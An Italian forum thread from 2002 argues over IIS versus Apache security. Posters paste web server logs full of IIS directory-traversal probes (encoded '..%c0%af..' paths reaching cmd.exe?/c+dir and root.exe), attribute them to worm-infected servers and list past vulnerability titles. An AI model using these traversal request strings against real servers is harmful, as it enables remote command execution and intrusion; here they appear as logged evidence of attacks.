"-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:32 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"212.199.191.251 - - [27/Mar/2002:18:07:43 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 318 "-" "-"212.199.191.251 - - [27/Mar/2002:18:07:49 +0100] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 321 "-" "-"
        • Anonimo scrive:
          Re: che tristezza l'invidia....
          toh, abbiamo avuto la stessa idea
          • Anonimo scrive:
            Re: che tristezza l'invidia....
            dici che se mandiamo il conto della banda allo zio bill ci paga? :)
        • Anonimo scrive:
          Re: che tristezza l'invidia....
          - Scritto da: z2
          sara' ma io nei miei log continuo a trovare
          sta roba fai un po te: Scusate la mia ignoranza in campo server, ma... Cos'è?Saluti
          • Anonimo scrive:
            Re: che tristezza l'invidia....
            - Scritto da: MaurizioB]zac[
            Scusate la mia ignoranza in campo server,
            ma... Cos'è?Server IIS bucati e infettati che cercano altri server pre bucare anche loro
          • Anonimo scrive:
            Re: che tristezza l'invidia....
            - Scritto da: 12
            - Scritto da: MaurizioB
            ]zac[

            Scusate la mia ignoranza in campo server,

            ma... Cos'è?

            Server IIS bucati e infettati che cercano
            altri server pre bucare anche loroOppure ragazzini para-hacker con programminoscritto alla bisogna.
        • Anonimo scrive:
          Re: che tristezza l'invidia....
          63.236.75.228 è una dial-up. quindi probabile chesia un ragazzino linuxizzato che cerca di scovaredegli IIS.212.199.191.251 non ha una porta 80 attiva, quindi ragionevolmente è la medesima cosa di cui sopra.
          • Anonimo scrive:
            Re: che tristezza l'invidia....
            lo so ma tanto il massimo che gli puoi fare e' scrivere all'abude del loro isp il quale il massimo che puo fare e' cancellare il suo account, ma siccome il ragazzino rompipalle a ricrearsi un altro account ci mette 5 minuti e' tutta fatica sprecata :(
      • Anonimo scrive:
        Re: che tristezza l'invidia....
        - Scritto da: cartaigenica


        - Scritto da: munehiro

        e' proprio vero... piu' fai cagare e piu'
        ti

        vogliono.

        WOW!
        Che commento tecnico!va bene... allora facciamo un commento tecnico ?e tecnico siaLe vulnerabilità (da cose serie a debolezze teoriche) che sono state registrate per Apache dal 96 a oggi:2001-08-12: Apache Mod ReWrite Rules Bypassing Image Linking 2001-08-09: Apache Server Address Disclosure 2001-07-10: Apache Possible Directory Index Disclosure 2001-04-12: Apache Web Server HTTP Request Denial of Service 2001-03-13: Apache Artificially Long Slash Path Directory Listing 2000-12-06: Apache Web Server with Php 3 File Disclosure 2000-09-29: Apache Rewrite Module Arbitrary File Disclosure 2000-05-31: Apache HTTP Server (win32) Root Directory Access 1999-09-25: NCSA/Apache httpd ScriptAlias Source Retrieval 1998-09-03: Multiple Vendor MIME Header DoS 1998-01-06: Apache Web Server DoS 1997-01-12: Apache mod_cookies Buffer Overflow 1996-12-10: Multiple Vendor nph-test-cgi 1996-04-01: Multiple Vendor test-cgi Directory Listing 1996-03-20: phf Remote Command Execution e quelle di Microsoft IIS2001-08-16: Microsoft IIS 4.0 URL Redirection DoS 2001-08-15: Microsoft IIS SSI Buffer Overrun Privelege Elevation 2001-08-15: Microsoft IIS 5.0 In-Process Table Privelege Elevation 2001-08-15: Microsoft IIS WebDAV Invalid Request Denial of Service 2001-08-15: Microsoft IIS MIME Header Denial of Service 2001-08-08: MS IIS Internal IP Address/Internal Network Name Disclosure 2001-07-04: Microsoft IIS Device File Local DoS 2001-07-04: Microsoft IIS Device File Remote DoS 2001-06-21: Microsoft IIS Unicode .asp Source Code Disclosure 2001-05-17: IIS WebDav Lock Method Memory Leak DoS 2001-05-15: MS IIS/PWS Escaped Characters Decoding Command Execution 2001-05-14: Microsoft IIS Various Domain User Account Access 2001-05-06: Microsoft IIS WebDAV 'Propfind' Server Restart 2001-05-01: Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow 2001-03-16: Microsoft IIS WebDAV 'Search' Denial of Service 2001-03-08: Microsoft IIS WebDAV Denial of Service 2001-03-01: Microsoft IIS Multiple Invalid URL Request DoS 2001-01-29: Microsoft IIS File Fragment Disclosure 2000-12-22: Microsoft IIS Front Page Server Extension DoS 2000-11-06: Microsoft IIS 4.0 ISAPI Buffer Overflow 2000-11-06: Microsoft IIS Executable File Parsing 2000-10-23: Microsoft IIS 4.0/5.0 Session ID Cookie Disclosure 2000-10-17: Microsoft IIS and PWS Extended Unicode Directory Traversal 2000-10-04: Microsoft IIS 5.0 Indexed Directory Disclosure 2000-09-05: Microsoft NT 4.0 and IIS 4.0 Invalid URL Request DoS 2000-08-21: Microsoft FrontPage/IIS Cross Site Scripting shtml.dll 2000-08-21: Microsoft IIS Cross Site Scripting .shtml 2000-08-14: Microsoft IIS 5.0 "Translate: f" Source Disclosure 2000-08-10: Microsoft IIS 4.0/5.0 File Permission Canonicalization 2000-07-17: Microsoft IIS 4.0/5.0 Source Fragment Disclosure 2000-07-14: Microsoft IIS 3.0 .htr Missing Variable Denial of Service 2000-07-13: Microsoft IIS Internal IP Address Disclosure 2000-05-14: Microsoft IIS FTP Denial of Service 2000-05-11: Microsoft IIS 4.0/5.0 Malformed File Extension DoS 2000-05-11: Microsoft IIS 4.0/5.0 Malformed Filename Request 2000-05-10: Microsoft IIS 4.0/5.0 Malformed .htr Request 2000-05-06: Microsoft Frontpage Server Extensions Path Disclosure 2000-04-12: Microsoft IIS 4.0/5.0 Escaped Characters 2000-03-30: Microsoft IIS UNC Mapped Virtual Host 2000-03-20: Microsoft IIS 4.0 Chunked Transfer Encoding Buffer Overflow 2000-03-08: Microsoft IIS UNC Path Disclosure 2000-02-15: Microsoft IIS 4.0 Pickup Directory DoS 2000-02-09: NT IIS ASP VBScript Runtime Error Viewable Source 2000-02-02: NT IIS idq.dll Directory Traversal 1999-12-21: Microsoft IIS Virtual Directory Naming 1999-12-21: Microsoft IIS Escape Character Parsing 1999-12-02: IIS / Site Server Multithread SSL 1999-09-23: Microsoft IIS 4.0 Domain Resolution 1999-09-23: Microsoft IIS FTP NO ACCESS Read/Delete File 1999-08-16: Microsoft IIS And PWS 8.3 Directory Name 1999-08-11: NT IIS Malformed HTTP Request Header DoS 1999-07-19: NT IIS MDAC RDS 1999-07-07: NT IIS SSL DoS 1999-06-24: NT IIS Double Byte Code Page 1999-06-15: NT IIS4 Buffer Overflow 1999-05-07: NT IIS Showcode ASP 1999-03-08: NT IIS ISAPI GetExtensionVersion() 1999-02-28: Microsoft IIS '../..' Denial of Service 1999-01-27: NT IIS4 Shared ASP Cache 1999-01-26: NT IIS4 DoS - ExAir Sample Site 1999-01-26: NT IIS IISAPI Extension Enumerate Root Web Server Directory 1999-01-24: NT IIS FTP DoS / Buffer Overflow 1999-01-22: NT IIS4 Log Avoidance 1999-01-14: NT IIS4 Remote Web-Based Administration 1999-01-14: IIS 4.0 fpcount.exe Buffer Overflow 1998-12-25: Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR 1998-07-01: NT IIS ASP Alternate Data Streams 1998-06-26: Multiple Vendor PKCS#1 1998-02-09: Microsoft IIS 4.0 IISADMPWD Proxied Password Attack1997-09-25: Microsoft IIS 3.0 newdsn.exe File Creation 1997-06-21: Microsoft IIS Long URL Denial of Service 1997-03-19: Microsoft IIS 3.0 "%2e" ASP Source Disclosure 1997-02-20: Microsoft IIS Appended Dot Script Source Disclosure 1996-03-01: Multiple Vendor .BAT/.CMD Remote Command Execution se poi vogliamo tirare in ballo tutto il resto e l'atteggiamento generale di microsoft nei confronti di tutti (utilizzatori, partner, mercato) non ne usciamo piu', ma sono cose dette e ridette.
      • Anonimo scrive:
        Re: che tristezza l'invidia....
        Le prime righe dei logs (con analog) di un server freebsd tirato su 18 giorni fa (i numeri accanto sono le richieste)Fai le opportune proporzioni1721: /scripts/..%5c../winnt/system32/cmd.exe1721: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir1547: /scripts/..%255c../winnt/system32/cmd.exe1547: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 987: /robots.txt 875: /scripts/winnt/system32/cmd.exe 875: /scripts/winnt/system32/cmd.exe?/c+dir 864: /scripts/root.exe 864: /scripts/root.exe?/c+dir 846: /MSADC/root.exe 846: /MSADC/root.exe?/c+dir 833: /c/winnt/system32/cmd.exe 833: /c/winnt/system32/cmd.exe?/c+dir 826: /d/winnt/system32/cmd.exe 826: /d/winnt/system32/cmd.exe?/c+dir 790: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 790: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 775: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 775: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 768: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 768: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 764: /scripts/..%c0%af../winnt/system32/cmd.exe 751: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 13: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 761: /scripts/..%c1%1c../winnt/system32/cmd.exe 761: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 746: /scripts/..%c1%9c../winnt/system32/cmd.exe 746: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 733: /scripts/..%252f../winnt/system32/cmd.exe 733: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
    • Anonimo scrive:
      Re: che tristezza l'invidia - risposta a tutti
      - Scritto da: munehiro
      e' proprio vero... piu' fai cagare e piu' ti
      vogliono.gli ho letti tutti i vostri log e ce li ho io pari pari.basta un minimo controllo e un pò di attenzione sul server x impedire problemi.il vero bug è l'incompetenza.
      • Anonimo scrive:
        Re: che tristezza l'invidia - risposta a tutti
        sveglia, il problema e' che quei log non dovrebbero esistere; ma ti rendi conto che chiunque abbia un web server viene bersagliato da quelle richieste? Sai che significa? Che e' pieno di server IIS infetti che infettano altri IIS e rubano banda a chi non usa IIS; ti pare una cosa ammissibile? Secondo te chi paga la banda che consumano tutti quei server infetti?
        • Anonimo scrive:
          Re: che tristezza l'invidia - risposta a tutti
          - Scritto da: z2
          sveglia, il problema e' che quei log non
          dovrebbero esistere; esatto!
          ma ti rendi conto che
          chiunque abbia un web server viene
          bersagliato da quelle richieste? Ma va?
          Sai che significa? Certo!
          Che e' pieno di server IIS
          infetti che infettano altri IIS e rubano
          banda a chi non usa IIS; ti pare una cosa
          ammissibile? No!
          Secondo te chi paga la banda
          che consumano tutti quei server infetti?Il punto è che tutto questo è dovuto a degli incompetenti che si trovano a dover gestire/configurare/controllare dei server.E non esiste sistema operativo a prova di idiota.
          • Anonimo scrive:
            Re: che tristezza l'invidia - risposta a tutti
            - Scritto da: cartaigenica
            Il punto è che tutto questo è dovuto a degli
            incompetenti che si trovano a dover
            gestire/configurare/controllare dei server.

            E non esiste sistema operativo a prova di
            idiota.Ma esistono diversi tipi di configurazioni di default e deversi tempi di risposta alle segnalazioni di bug (vero Guninski? ;o).
          • Anonimo scrive:
            Re: che tristezza l'invidia - risposta a tutti
            - Scritto da: cartaigenica


            - Scritto da: z2

            sveglia, il problema e' che quei log non

            dovrebbero esistere;

            esatto!
            allora capisci che IIS e' un giocattolo

            ma ti rendi conto che

            chiunque abbia un web server viene

            bersagliato da quelle richieste?

            Ma va?


            Sai che significa?

            Certo!


            Che e' pieno di server IIS

            infetti che infettano altri IIS e rubano

            banda a chi non usa IIS; ti pare una cosa

            ammissibile?

            No!
            e allora?

            Secondo te chi paga la banda

            che consumano tutti quei server infetti?


            Il punto è che tutto questo è dovuto a degli
            incompetenti che si trovano a dover
            gestire/configurare/controllare dei server.

            E non esiste sistema operativo a prova di
            idiota.be se cosi' fosse ci sarebbero dei log di server apache infetti da qualche worm e gestiti da admin incompetenti, visto che cosi' non e' le possibilita' sono due:1)tutti gli admin win sono incompetenti e tutti gli admin unix non lo sono2)IIS fa cagare mentre apache e' un buon server seppur non perfettoio non credo che tutti gli admin win siano incompetenti tu?
      • Anonimo scrive:
        SCHIFO TOTALE!
        forse è un po off topic, ma è 2 ore che sto cercando di scaricare degli aggiornamenti da corporate windowsupdate e una simpatica animazione mi avvisa che è in corso la preparazione degli elementi per il download...(a scanso di inutili flame premetto che ho seguito esattamente la procedura, compresa la calata di braghe davanti all'activeX, e che quando devo scaricare pochi elementi funziona).Ma porca sultana! Che cosa ci vuole a mettere dei semplici link ai file da scaricare, fare una semplice pagine web testuale aggiornata periodicamente ad ogni rilascio degli aggiornamenti? Anche un bambino saprebbe mantenerla!E visto che la pagina si rivolge a operatori IT, non servono tante cav0l4te, basta mettere gli aggiornamenti divisi per prodotto e data di rilascio poi me li cerco "trova in questa pagina" o simili!Che interesse c'è a fare un sistema così macchinoso?Bill, ti dice niente la frase di Henry Ford "quello che non c'è non si può rompere"? Dopo un secolo lui è sul mercato, te non so mica!
        • Anonimo scrive:
          Re: SCHIFO TOTALE!
          Non lo so ragazzi, io credo che sia necessario essere un pochino più obiettivi. Possibile che Ms sia da buttare e Unix sia da elevare sul podio? Io sinceramente non ho mai avuto problemi di update dal sito di ms, cio' non toglie ovvio che sarebbe forse più pratico sdoppiare la richiesta: una automatizzata ( per i semplici user) e una manuale (per gli IT professional).Io mi occupo di admin su entrambe le piattaforme e vi garantisco che un IIS ben configurato arriva ad essere molto sicuro. E' ovvio che un user senza esperienza in admin su web non ha le capacità di amministrare una piattaforma web, nemmeno se è MS! In giro purtroppo si sente più volte la frase "uso MS perchè mi serve meno know how". NON E' VERO, tutto qui.
          • Anonimo scrive:
            Re: SCHIFO TOTALE!
            Al di là del fatto che è la stessa M$ a far credere che amministrare i server web con il suo sw, serva meno preparazione, anzi t'invoglia a non averla con tutte le schermatine colorate facilitate dei suoi sw e delle case che s'allineano a questo comandamento.Viceversa amministrare uno UNIX non puoi farlo cmq senza preparazione, di favole le puoi raccontare quante ne vuoi.Ma a parte ciò, credo che anche win e iis abbiano la loro colpa, se dal 96 ad oggi iis ha avuto oltre 60 bug, mentre Apache solo 6, qualcosina vorrà dire, non è sempre colpa dell'admin; se iis necessita di stare sempre attenti alle patchs, la colpa non è dell'admin (poveraccio).Se win su cluster fà schifo, ugualmente la colpa non è dell'admin; e potremmo continuare; diamo a Cesare quel che è di Cesare, e a dio (no, non Bill, per ora ancora no) quel che è di dio.
Chiudi i commenti